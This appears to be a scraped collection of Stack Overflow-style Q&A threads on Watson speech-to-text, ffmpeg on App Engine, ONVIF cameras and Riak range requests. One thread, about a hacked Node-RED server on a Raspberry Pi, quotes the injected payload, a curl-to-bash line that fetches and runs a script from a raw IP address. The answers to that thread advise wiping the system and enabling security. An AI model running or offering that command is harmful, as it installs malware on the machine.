Terrible Watson transcription - ibm-watson

I'm trying to use Watson to create a transcription of an audio file in Brazilian Portuguese. I made the call to the API and the result returned successfully, but the transcription is beyond terrible. It's absolutely useless, with not a single word recognized correctly.
I used the following command:
curl -X POST -u "apikey:<key>" --header "Content-Type: audio/mp3" --data-binary @./file.mp3 "https://api.us-south.speech-to-text.watson.cloud.ibm.com/instances/<code>/v1/recognize?model=pt-BR_BroadbandModel"
The test audio is a 9-minute excerpt of a 90-minute recording: an interview between a researcher and a dockworker, recorded with a cell phone. I have uploaded it here for examination: https://drive.google.com/file/d/1Xuibxksudp55uwaz6oSOccTZ3pP7Dya9/view?usp=sharing
Watson's transcription cannot possibly be this bad. What am I missing? Do I have to set some parameter, or do some work on the audio first?
I also tried the narrowband model, and the FLAC format as well.
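As a side note, the same call can be sketched from Python using only the standard library. The instance URL and API key below are placeholders; the point is that the model goes in the query string (after `?`), and the `@` in curl marks the file whose bytes go in the request body:

```python
import base64
import urllib.parse
import urllib.request

APIKEY = "your-api-key"  # placeholder
BASE = "https://api.us-south.speech-to-text.watson.cloud.ibm.com/instances/your-instance-id"

def build_recognize_request(model="pt-BR_BroadbandModel", content_type="audio/mp3"):
    """Build (but do not send) the POST request to /v1/recognize."""
    url = BASE + "/v1/recognize?" + urllib.parse.urlencode({"model": model})
    token = base64.b64encode(("apikey:" + APIKEY).encode()).decode()
    return urllib.request.Request(
        url,
        method="POST",
        headers={"Content-Type": content_type, "Authorization": "Basic " + token},
        # To actually send it, set data=open("./file.mp3", "rb").read()
        # and then call urllib.request.urlopen(req)
    )

req = build_recognize_request()
print(req.full_url)  # ends with /v1/recognize?model=pt-BR_BroadbandModel
```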

The IBM Watson API does not seem well designed for end users; its API design is overcomplicated for plain transcription jobs, and it may have a bug that their team has not been able to track down.
It is, however, advisable to work with Google and the SpeechRecognition module:
pip install --upgrade SpeechRecognition (Linux/Unix systems)
or C:\path_to_python.exe -m pip install --upgrade SpeechRecognition (Windows)
This is one module with built-in support for the different API providers, such as IBM, Google, Microsoft, etc.
Just by using:
import speech_recognition as sr

r = sr.Recognizer()
with sr.AudioFile("path/to/audio/file") as source:
    # r.adjust_for_ambient_noise(source)  # depending on if you have background noise
    audio = r.record(source)
Then recognize the recorded audio, where xxx is the API provider from a list, say google, ibm, azure or bing (with Microsoft):
t = r.recognize_xxx(audio, credentials, ...)
Read up more on the module to be more precise; this is only a rough guide.

Related

ffmpeg won't execute properly in google app engine standard nodejs

I have tried for three full days to get GAE (standard - nodejs) to run a simple video transcoder from MOV to MP4 using ffmpeg. I have tried using fluent-ffmpeg and kicking off a child process (e.g. spawn), and nothing works. As soon as it hits the call to the executable, it always errors. I have confirmed ffmpeg is installed and even tried using ffmpeg-static. Moreover, I have it working on my local machine with no problems (using all of the aforementioned ways).
I have also tried logging the errors, and nothing is really all that helpful. I can see it's working through every installed package, including ffmpeg (system package).
Below is the pseudocode; step three is where the problem occurs.
1. Send the file name to the GAE endpoint
2. Download the file from Google Cloud Storage to a temp file
3. Transcode using ffmpeg
4. Upload the temp file to Google Cloud Storage
5. Remove the old Google Cloud Storage file
6. Remove the temp file
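The transcode step can be sketched language-agnostically; here in Python, with hypothetical temp-file paths and common H.264/AAC codec flags (the question does not specify which flags were used):

```python
import subprocess

def build_ffmpeg_args(src, dst):
    """Argument list for a MOV -> MP4 transcode; -y overwrites dst if it exists."""
    return ["ffmpeg", "-y", "-i", src, "-c:v", "libx264", "-c:a", "aac", dst]

args = build_ffmpeg_args("/tmp/in.mov", "/tmp/out.mp4")
# subprocess.run(args, check=True, capture_output=True)  # real call; needs ffmpeg on PATH
```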
The file I am using to test is 6 MB: a 5-second video I took on my iPhone. Thank you in advance.
UPDATE: I successfully deployed the exact same code to the Node Flex environment and everything works great. I wasn't able to get any errors in the standard environment that directed me where to look, but my guess is it has something to do with how the file I pipe into ffmpeg is stored on GAE Node Standard. The docs say it's a virtual file system that uses RAM. I'd love to hear if anybody managed to get it working in the standard environment.
After a long battle, I finally figured out what was going on. I did not have enough compute resources. If anyone out there is going to build a transcoding service for images and videos, be sure you up your cores to at least 4 out of the gate. My jobs were randomly failing (but not repeatable for processing the same files), web sockets were disconnecting and reconnecting, etc.
To the person who downvoted my question because I did not post an error (which, as I stated, I did not really have): there isn't necessarily going to be an error in the logs when your CPU starts dropping jobs because it can't keep up with the load. As I mentioned in my question, I would get errors, but nothing meaningful.
You're right, ffmpeg is listed in the pre-installed packages for the Node.js Runtime.
However they don't mention which ffmpeg version is installed.
I looked into the fluent-ffmpeg prerequisites and it requires ffmpeg >= 0.9 to work.
Try to update your ffmpeg version by running:
apt-get update && apt-get install --only-upgrade ffmpeg
in your instance's console. Tell us how it goes.
// create a reference to your storage bucket path
const outFile = bucket.file(`${storagePath}`)
const outStream = outFile.createWriteStream()
You can always attach an 'stderr' listener to your ffmpeg command.
I had similar problems transcoding on Google App Engine, and fluent-ffmpeg's stderr listener helped me a lot in debugging.
ffmpeg.addInput(`tmp/${app_engine_filepath}`)
  .format('mp3')
  .on('stderr', function (stderrLine) {
    console.log('Stderr output: ' + stderrLine);
  })
  .on('error', (error) => {
    console.log(error);
  })
  .pipe(outStream)
  .on('end', () => {
    fs.remove(`tmp/${app_engine_filepath}`);
  });
You might also want to check your ffmpeg version on the standard environment (that should also be viewable through the stderr logs).

How to start the actual "Speech to text"?

I am a freelance author and have gathered tons of hours of interview material which needs to be transcribed.
While browsing the Internet I came across IBM Watson "Speech to Text", which should be the ideal solution for handling that huge amount of spoken word.
After registration I am struggling with even opening it, since I am not very well versed in programming.
Can someone provide an example with steps that I can follow to achieve my task?
Which platform do you want to use the Speech to Text service on?
If you are not a coder, then the best starting point for you will be Node-RED. Take a look at this tutorial that creates a translator - https://developer.ibm.com/tutorials/build-universal-translator-nodered-watson-ai-services/?cm_mmc=IBMDev--Digest--ENews2019-_-email&spMailingID=39408813&spUserID=MzYzODEwODAwNzk4S0&spJobID=1500992192&spReportId=MTUwMDk5MjE5MgS2
It uses Speech to Text, Translation, and Text to Speech; you will only need the Speech to Text bit. Once you get it working with a microphone, you can make use of the file inject node to push your own audio files through the service.
For larger files you will need to make use of http post and multi-parts, when you get to that point, raise a new question, tag it with node-red and someone will post a sample flow for you.
You do not need any programming knowledge to use Watson Speech to Text. You can just send your files to the service using the curl tool, which you can easily install on your computer; it is free.
Then you can send a file to the service running the following command:
curl -X POST -u "apikey:{apikey}" --header "Content-Type: audio/flac" --data-binary @audio-file2.flac "https://stream.watsonplatform.net/speech-to-text/api/v1/recognize"
You just need an apikey to run that command, which you can get following these steps: https://cloud.ibm.com/docs/services/watson?topic=watson-iam
Then just replace the .flac file in that command with the file you want to process, and pass the right value for the Content-Type header. For FLAC files it is audio/flac; for other audio formats you have the list here: https://cloud.ibm.com/apidocs/speech-to-text
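For convenience, here is a small lookup table in Python covering the common cases. The flac/mp3/wav values come from the docs linked above; any format not listed should be checked there rather than guessed:

```python
import os

# Content-Type values the service expects for common audio formats.
CONTENT_TYPES = {
    ".flac": "audio/flac",
    ".mp3": "audio/mp3",
    ".wav": "audio/wav",
    ".ogg": "audio/ogg",
}

def content_type_for(filename):
    """Return the Content-Type header value for a file, or None if unknown."""
    ext = os.path.splitext(filename)[1].lower()
    return CONTENT_TYPES.get(ext)

print(content_type_for("audio-file2.flac"))  # audio/flac
```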

Remove Multiple Node-Red Flows - Raspberry Pi LAMP Hack

I have a Raspberry Pi LAMP server which I use as a hobby. I also have Node-RED installed, which I use for ESP8266 sensors.
I looked at Node-RED today and there are possibly 40-50 flows added (which I did not create). They all have the same timestamp, feeding into a message payload. The payload is
curl -s http://192.99.142.248:8220/mr.sh | bash -sh
The same as is reported here:
SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process
Does anyone know how I can delete all the flows? Can I delete Node-RED and do a clean install? I don't have anything on the RPi which I need to keep. Thanks.
Please refer to this post on the Node-RED forum: https://discourse.nodered.org/t/malware-infecting-unsecured-node-red-servers/3460
This comes as a result of exposing Node-RED to the internet without applying any security.
Your safest course of action is to wipe the SD card and start with a clean system.
Make sure you enable security this time - details in the post linked above.
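The usual way to do that is the `adminAuth` block in Node-RED's `settings.js`. A minimal sketch (the password hash below is a placeholder; generate your own with `node-red admin hash-pw`):

```javascript
// In settings.js: require a login for the Node-RED editor.
adminAuth: {
    type: "credentials",
    users: [{
        username: "admin",
        password: "$2b$08$replace.with.your.own.bcrypt.hash",
        permissions: "*"
    }]
},
```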

Retrieve network camera stream URL in Linux

I am trying to retrieve the RTSP URLs of cameras on my network. I can do this using ONVIF Device Manager on Windows, but how can I do this on Linux using C/C++ or a command-line tool? I have tried various libs, e.g. onvifc (OpenCVR) and onvifcpplib, but none of them would compile on Linux, nor do they have API documentation. Any suggestions, please!
I was able to find a gSOAP-ONVIF solution at https://github.com/tonyhu/gsoap-onvif. This program successfully retrieves parameters from most ONVIF-compliant cameras.
You can have a try with python-onvif; it covers some of the features you may need, and perhaps others such as PTZ.
You can also have a try with OpenCVR's other project, https://github.com/veyesys/h5stream; if you can't compile it, you can download it from SourceForge.
Good luck.

How to configure Riak 1.3.* with range request (Accept-Ranges: bytes)

I'm trying to use Riak for storing video content. I'm already able to push my video to Riak with the correct MIME type, and I can also retrieve the video by its URL.
The Riak page tells me that Riak version 1.3.* is capable of supporting range requests.
But curl -I MYRIAKVIDEOURL doesn't return the Accept-Ranges: bytes HTTP header (as my Apache does). Also, when VLC makes a range request (by seeking to the middle of the video), it seems no range request is initiated: loading takes long and the network shows a lot of downloaded traffic. When doing the same with the video URL served by my Apache server (tried on the same machine), range requests work well within VLC.
Anyone any idea how to achieve this with Riak (running on Debian 7, compiled from source; also tried Ubuntu 12.04)? Am I able to manipulate the HTTP headers Riak sends?
Thanks for the help.
Do you intend to use plain Riak? I think Riak CS is more suitable for storing video files.
Riak CS supports the Range header for GET Object requests.
Sample request by s3curl is like:
s3curl.pl -- -v -x localhost:8080 -H 'Range: bytes=1000-2000' \
http://yourbuckethere.s3.amazonaws.com/your/file/here
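To check a server's answer programmatically, the things to look for are an `Accept-Ranges: bytes` header or a `206 Partial Content` status. A minimal, server-agnostic helper (not Riak-specific):

```python
def supports_byte_ranges(status_code, headers):
    """True if a response suggests byte-range support: an explicit
    Accept-Ranges: bytes header, or a 206 reply to a Range request."""
    accept = headers.get("Accept-Ranges", "").lower()
    return status_code == 206 or accept == "bytes"

# e.g. the response to: curl -I -H 'Range: bytes=1000-2000' <url>
print(supports_byte_ranges(206, {"Content-Range": "bytes 1000-2000/431522"}))  # True
print(supports_byte_ranges(200, {}))  # False
```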
